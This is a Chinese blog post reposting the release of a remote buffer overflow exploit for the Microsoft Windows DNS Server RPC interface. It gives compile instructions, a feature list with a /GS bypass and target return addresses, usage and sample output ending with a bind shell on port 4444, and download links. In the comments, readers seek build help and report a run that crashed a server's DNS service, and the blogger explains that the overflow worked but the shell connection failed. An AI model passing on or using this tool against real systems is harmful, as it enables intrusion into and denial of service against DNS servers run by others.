MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

鬼仔注:V2
看到有朋友留言说不知道怎么编译,这里说下用VC里用Makefile文件编译的方法:
运行cmd.exe
进到vc/bin目录
运行vc-vars32.bat
进到makefile所在的目录
nmake /f makefile

来源:milw0rm

Exploit v2 features:
– Target Remote port 445 (by default but requires auth)
– Manual target for dynamic tcp port (without auth)
– Automatic search for dynamic dns rpc port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 server and Windows 2003 server (Spanish) supported by default
– Fixed bug with Windows 2003 Shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
– Microsoft RPC api used ( who cares? :p )

D:\Programaci?3n\DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service

D:\Programaci?3n\DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444

also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

# milw0rm.com [2007-04-18]

相关日志

楼被抢了 9 层了... 抢座Rss 2.0或者 Trackback

  • 719100

    怎么把这个弄成v.exe?

  • enterbd

    很容易的, midl一下,然后nmake一下就ok了,

  • enterbd

    鬼仔最近可好?

  • 鬼仔

    我把方法写到文章中了。

    to enterbd:还可以,老样子了

  • 卡卡卡

    :cry: vs8下 没编译出来

  • 719100

    谢 :lol:

  • 鬼仔

    VS8?

  • 3389

    用中文版2003测试,出现如下提示
    E:\>dnstest -h 192.168.1.109
    ————————————————————–
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    ————————————————————–

    [+] Trying to fingerprint target.. (05.02)
    [+] Remote Host identified as Windows 2003
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp:192.168.1.109
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:192.168.1.109[1047]
    [+] Dynamic DNS rpc port found (1047)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.10
    9[1047]
    [+] RpcBindingFromStringBinding success
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444
    [-] RPC Server reported exception 0x6be = 1726
    [-] Looks like remote RPC server crashed :/

    而且服务器DNS服务失败,53端口关闭,这是怎么回事呢,请教

  • 鬼仔

    溢出成功,但是连接失败

发表评论